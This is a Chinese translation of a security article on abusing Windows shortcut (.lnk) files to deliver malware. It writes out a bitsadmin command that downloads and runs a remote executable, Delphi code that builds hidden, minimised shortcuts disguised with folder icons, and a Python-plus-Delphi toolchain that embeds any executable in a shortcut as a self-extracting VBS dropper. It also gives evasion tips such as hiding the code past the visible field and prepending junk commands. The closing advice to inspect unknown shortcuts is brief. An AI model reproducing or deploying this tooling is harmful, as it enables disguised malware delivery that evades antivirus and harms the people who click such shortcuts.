翻译:shan66
预估稿费:200RMB(不服你也来投稿啊!)
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
最近,安全研究人员发现了一种在Microsoft Windows操作系统中通过快捷方式安装恶意软件的方法。我们对于快捷方式再熟悉不过了,几乎每个人都在用,并且大家都没有戒心。正是由于这些特点,使得这些恶意软件很难发现,同时,清除起来就更困难了。
前言
快捷方式并非二进制可执行文件,常用来指向其他地方的文件夹或文件。但是,它却可以执行Windows shell命令(这可能是一个非常危险的功能,通常用于编程任务,如系统的关闭/注销/直接通过常规快捷方式重新启动等)。
由于快捷方式不是二进制可执行文件,所以防病毒程序通常也不会检测快捷方式是否是恶意的。
快捷方式可以通过归档文件共享,而不会丢失其属性。
最后,你可以轻松地更改图标,所以恶意快捷方式很容易伪装成文件夹图标或图像。这可能有助于恶意软件通过社交媒体进行传播。
漏洞详述
为了描述这种威胁,我们需要首先介绍一个本地的Windows程序,该程序名为BITSAdmin Tool,它可以嵌入到Windows XP SP2之后的所有Windows系统中。关于这个程序的详细介绍,请访问MSDN链接:
https://msdn.microsoft.com/en-us/library/windows/desktop/aa362813(v=vs.85).aspx。
简单来说,这个命令行工具主要用于创建下载任务并监视其进度。然而,使用这些命令行是非常危险的,因为Bitsadmin.exe带有微软签名,所以其他防病毒软件自然会对它放行,并且它能够以单独的命令行方式使用。
下面是BITSAdmin命令的一个例子:
bitsadmin /transfer downloader /priority normal https://phrozensoft.com/uploads/2016/09/Winja_2_6084_65441_setup.exe %temp%setup.exe现在,让我们使用这个命令行工具来利用一个新的Windows快捷方式。
DIY,手动方式
在资源管理器中(例如桌面上的空闲处)单击右键,然后单击“Create a new shortcut”菜单项。
然后,输入以下命令行:
cmd.exe /C "%windir%System32bitsadmin.exe /transfer downloader /priority normal https://phrozensoft.com/uploads/2016/09/Winja_2_6084_65441_setup.exe %temp%setup.exe & %temp%setup.exe"
然后保存。
现在,在这个快捷方式上面单击右键,然后,选择属性。
将“Run”选项切换为“Run Minimized”
最后,将图标换为你最新喜欢的样子(例如文件夹图标)
为了在共享快捷方式时保持图标不变,建议使用shell32.dll的图标(因为所有Windows系统中都有shell32.dll)。
注意:在Microsoft系统中,除了shell32.dll之外,Ieframe.dll、imageres.dll、pnidui.dll、wmploc.dll等文件的图标也非常有用。
好了,恶意快捷方式现已准备就绪了。
DIY,编程方式(Delphi)
uses ActiveX, ShlObj, ComObj;
function MaliciousLnk(fileUrl, destFile : String) : Boolean;
var cObject : IUnknown;
shellLink : IShellLink;
PFile : IPersistFile;
LinkName : string;
Cmd : String;
begin
result := false;
CoInitialize(nil);
try
cObject := CreateComObject(CLSID_ShellLink);
shellLink := cObject as IShellLink;
PFile := cObject as IPersistFile;
Cmd := '/C "c:windowssystem32bitsadmin.exe /transfer downloader /priority normal "' + fileURL + '" %temp%tmp.exe & %temp%tmp.exe"';
shellLink.SetDescription('www.phrozensoft.com');
shellLink.SetPath('cmd.exe');
shellLink.SetArguments(PWideChar(cmd));
shellLink.SetShowCmd(SW_SHOWMINNOACTIVE);
shellLink.SetWorkingDirectory('%windir%system32');
shellLink.SetIconLocation('shell32.dll', 1);
result := PFile.Save(PWideChar(destFile), false) = S_OK;
finally
CoUninitialize();
end;
end;注意,这种技术在Windows XP SP2到Windows 10(最新版本)的所有版本上面都有效,其中包括相应的服务器版本。
通过这种方法,黑客甚至不需要创建下载恶意软件的代码,从而可以逃避防病毒检测。这里没有用到任何二进制可执行文件!
这里的bitsadmin.exe只是用来说明Windows快捷方式用法的一个例子,可以这么说,凡是可以通过命令行方式做到的事情,都可以通过快捷方式做到,例如:
使用所有常规的Windows DOS命令
使用PowerShell来制作恶意代码
使用新版Windows 10的嵌入式Linux系统(仅限于已激活此选项的用户)
使用rundll32.exe调用DLL导出的函数
等等…
注意:对于不需要使用PowerShell的普通Windows用户(默认情况下已启用)来说,我们建议卸载该软件包。这样可以免受所有通过PowerShell安装恶意代码的恶意软件的攻击。
请按照以下步骤卸载PowerShell包(可以随时还原)
打开Program and Features,然后点选Turn Windows features on or off
向下滚动到PowerShell列表项,然后取消选中该复选框
重新启动后,PowerShell包就会从您的系统中卸载。
利用Windows快捷方式的新方法
就在昨天,我们报告了一种通过快捷方式来感染Microsoft Windows用户的方法,该方法可以使用BITSAdmin工具来下载和执行远程应用程序。
我们的第一个示例的主要问题在于,防火墙可能会拦截下载尝试,而要想执行远程文件,则必须首先通过远程http/https连接进行下载。
现在,安全研究人员又发现了另一种利用Windows快捷方式的新方法:将任意文件(如应用程序文件)直接嵌入到快捷方式本身内部。
没错! 该应用程序就藏在Windows的快捷方式本身内部。
这使得恶意应用程序在执行之前,无论任何防病毒软件,根本就检测不到它。
注意:在下面介绍的PoC中,我们将使用这个漏洞作为文件dropper,与此同时,我们也可以采用另一种方式:将二进制文件直接注入内存,而不写入磁盘,这样的话,当这个恶意软件运行时,防病毒软件就更加难以检测到它了。关于后面这种方法,我们将单独写一篇文章进行详细介绍。
它是如何工作的?
首先要做的是:创建一个恶意的VBS(Visual Basic脚本),它用于:
将应用程序文件转换为字节数组(通过python脚本完成)
然后创建一个临时的.exe文件
将字节数组写入此临时文件中
执行这个临时的.exe文件。
准备好VBS脚本后(仍然使用我们的python脚本示例),我们将该VBS代码转换为等价的一个单命令行,以便插入到新的快捷方式中。
通常来说,Windows快捷方式命令的最大长度在260个字符左右,但是,对于利用之前Delphi技巧所新建的快捷方式来说,你可以插入任意数量的字符,都不会对快捷方式造成不良影响。
创建内联恶意VBS应用程序提取器的脚本(Python 3.5)
# SHORTCUT EXPLOIT : FILE BINDER (WRAPPER)
# DISCOVERED AND CODED BY : @DarkCoderSc
# https://twitter.com/DarkCoderSc
# Lead Developer / Security Researcher at Phrozen SAS (https://phrozensoft.com)
# [email protected]
############################################
# This little script will generate a malicious shortcut. A file will be embedded
# Inside, when executed it will be extracted and executed.
import sys
import os
if len(sys.argv) != 3:
print("Missing arguments!n")
print("Usage:n")
print(r"1) The executable file to be dropped (Needs to Exists)")
print(r"2) The destination malicious shell payload file")
exit()
FEXEFile = str(sys.argv[1])
FFileDest = str(sys.argv[2])
if not os.path.exists(FEXEFile):
print("The input executable file must exists!")
exit()
#
# TRANSFORM INPUT FILE IN BINARY ARRAY
#
payload = "payload=array(";
with open(FEXEFile, 'rb') as FFile:
while True:
s = FFile.read(1)
if len(s) == 0: break
b = ord(s)
payload += str(b) + ","
payload = payload[:-1]
payload += ")"
FFile.close
#
# WRITE VBS EXTRACTION AND EXECUTION CODE TO BE PLACED IN A SHELL
#
tempFile = " >> %temp%\tmp.vbs"
maliciousVBS = "del %temp%\tmp.vbs & "
maliciousVBS += "echo " + payload + tempFile + " & "
maliciousVBS += "echo " + "Set FSO = Wscript.CreateObject("Scripting.FileSystemObject")" + tempFile + " & "
maliciousVBS += "echo " + "Set CTF = FSO.CreateTextFile("%temp%\tmp.exe")" + tempFile + " & "
maliciousVBS += "echo " + "for i = 0 to UBound(payload)" + tempFile + " & "
maliciousVBS += "echo " + "buff = buff^&chr(payload(i))" + tempFile + " & "
maliciousVBS += "echo " + "next" + tempFile + " & "
maliciousVBS += "echo " + "CTF.Write buff" + tempFile + " & "
maliciousVBS += "echo " + "Dim objShell" + tempFile + " & "
maliciousVBS += "echo " + "Set objShell = WScript.CreateObject("WScript.Shell")" + tempFile + " & "
maliciousVBS += "echo " + "CTF.Close" + tempFile + " & "
maliciousVBS += "echo " + "objShell.Run("%temp%\tmp.exe")" + tempFile + " & "
maliciousVBS += "%temp%\tmp.vbs"
with open(FFileDest, 'w') as FDest:
FDest.write(maliciousVBS)将内联恶意VBS应用程序提取器注入到快捷方式的脚本(Delphi)
(*
SHORTCUT EXPLOIT : FILE BINDER (WRAPPER)
DISCOVERED AND CODED BY : @DarkCoderSc
https://twitter.com/DarkCoderSc
Lead Developer / Security Researcher at Phrozen SAS (https://phrozensoft.com)
[email protected]
*)
program Shortcut_gen;
{$APPTYPE CONSOLE}
uses
System.SysUtils, ActiveX, ShlObj, ComObj, Windows, Classes;
function MaliciousLnk(cmd, destPath : String) : Boolean;
var cObject : IUnknown;
shellLink : IShellLink;
PFile : IPersistFile;
begin
result := false;
CoInitialize(nil);
try
cObject := CreateComObject(CLSID_ShellLink);
shellLink := cObject as IShellLink;
PFile := cObject as IPersistFile;
cmd := '/C "' + cmd + '"';
shellLink.SetDescription('@DarkCoderSc');
shellLink.SetPath('cmd.exe');
shellLink.SetArguments(PWideChar(cmd));
shellLink.SetShowCmd(SW_SHOWMINNOACTIVE);
shellLink.SetWorkingDirectory('%windir%system32');
shellLink.SetIconLocation('shell32.dll', 1);
result := PFile.Save(PWideChar(destPath), false) = S_OK;
finally
CoUninitialize();
end;
end;
var Arg1, Arg2 : String;
strList : TStringList;
begin
try
if ParamCount <> 2 then begin
writeln('usage:');
writeln('- Arg1 : Payload file, generated with the "gen_shortcut_code.py"');
writeln('- Arg2 : Full path of destination shortcut');
exit;
end;
Arg1 := ParamStr(1);
Arg2 := ParamStr(2);
if NOT FileExists(Arg1) then exit;
// THIS IS JUST A LAZY WORKING EXAMPLE OF OPENNING TEXT FILES
strList := TStringList.Create;
strList.LoadFromFile(Arg1);
MaliciousLnk(strList.Text, Arg2);
strList.Free;
finally
writeln(#13#10 + 'Press enter to leave...');
readln;
end;
end.生成的payload示例(利用x86汇编语言编写的Hello World示例)
del %temp%tmp.vbs & echo payload=array(77,90,128,0,1,0,0,0,4,0,16,0,255,255,0,0,64,1,0,0,0,0,0,0,64,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111,103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,10,36,0,0,0,0,0,0,0,0,80,69,0,0,76,1,2,0,133,214,90,88,0,0,0,0,0,0,0,0,224,0,15,1,11,1,1,71,0,2,0,0,0,2,0,0,0,0,0,0,0,16,0,0,0,16,0,0,0,32,0,0,0,0,64,0,0,16,0,0,0,2,0,0,1,0,0,0,0,0,0,0,4,0,0,0,0,0,0,0,0,48,0,0,0,2,0,0,9,63,0,0,2,0,0,0,0,16,0,0,0,16,0,0,0,0,1,0,0,0,0,0,0,0,0,0,16,0,0,0,0,0,0,0,0,0,0,0,0,32,0,0,176,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,46,116,101,120,116,0,0,0,42,0,0,0,0,16,0,0,0,2,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,0,0,96,46,105,100,97,116,97,0,0,176,0,0,0,0,32,0,0,0,2,0,0,0,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,64,0,0,192,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,106,0,255,21,104,32,64,0,80,232,12,0,0,0,72,101,108,108,111,32,87,111,114,108,100,0,106,0,255,21,152,32,64,0,106,0,255,21,100,32,64,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,88,32,0,0,0,0,0,0,0,0,0,0,60,32,0,0,100,32,0,0,144,32,0,0,0,0,0,0,0,0,0,0,74,32,0,0,152,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,75,69,82,78,69,76,51,50,46,68,76,76,0,0,85,83,69,82,51,50,46,68,76,76,0,0,0,0,112,32,0,0,126,32,0,0,0,0,0,0,112,32,0,0,126,32,0,0,0,0,0,0,0,0,69,120,105,116,80,114,111,99,101,115,115,0,0,0,71,101,116,67,111,109,109,97,110,100,76,105,110,101,65,0,160,32,0,0,0,0,0,0,160,32,0,0,0,0,0,0,0,0,77,101,115,115,97,103,101,66,111,120,65,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0) >> %temp%tmp.vbs & echo Set FSO = Wscript.CreateObject("Scripting.FileSystemObject") >> %temp%tmp.vbs & echo Set CTF = FSO.CreateTextFile("%temp%tmp.exe") >> %temp%tmp.vbs & echo for i = 0 to UBound(payload) >> %temp%tmp.vbs & echo buff = buff^&chr(payload(i)) >> %temp%tmp.vbs & echo next >> %temp%tmp.vbs & echo CTF.Write buff >> %temp%tmp.vbs & echo Dim objShell >> %temp%tmp.vbs & echo Set objShell = WScript.CreateObject("WScript.Shell") >> %temp%tmp.vbs & echo CTF.Close >> %temp%tmp.vbs & echo objShell.Run("%temp%tmp.exe") >> %temp%tmp.vbs & %temp%tmp.vbs如果将它粘贴到您喜欢的命令提示符下,它会将一个VBS文件提取到临时文件夹中,如果运行此VBS文件的话,它将执行该嵌入式应用程序。
当你将这个payload注入一个快捷方式后,只需点击该快捷方式,它就会替你完成所有的工作!
使用方法
生成内联恶意VBS应用程序提取器
py gen_inlinecode.py @APPLICATION_LOCATION @PAYLOAD_DESTINATION然后生成快捷方式
shortcut_gen.exe @PAYLOAD_LOCATION @SHORTCUT_DESTINATION现在,将生成一个新的快捷方式,其中包含一个完整的应用程序。当双击该快捷方式时,它将提取出嵌入其中的应用程序,然后从临时文件夹执行该程序。
注意,如果打开快捷方式属性,则整个代码就不可用了,因为Microsoft通常只允许在参数字段中添加260个字节。这使得快捷方式更难以引起人们的警觉。
我们还可以修改脚本,使其在漏洞利用代码之前生成一个普通的垃圾“代码”,那么普通用户就会认为它是一个正常/安全的快捷方式。
PoC视频
快捷方式的最大尺寸约为64 KiB,这使得此漏洞可以兼容许多已知/未知病毒。
结束语
不要盲目相信你遇到的快捷方式。它们可能是用来隐藏恶意代码的,并且这些恶意软件通常是防病毒软件无法检测到的。如果随意打开的话,很可能就会中招!
您可以花些时间打开未知快捷方式的属性,看看它都是执行哪些命令。
如果您有任何疑问,请删除它!
评论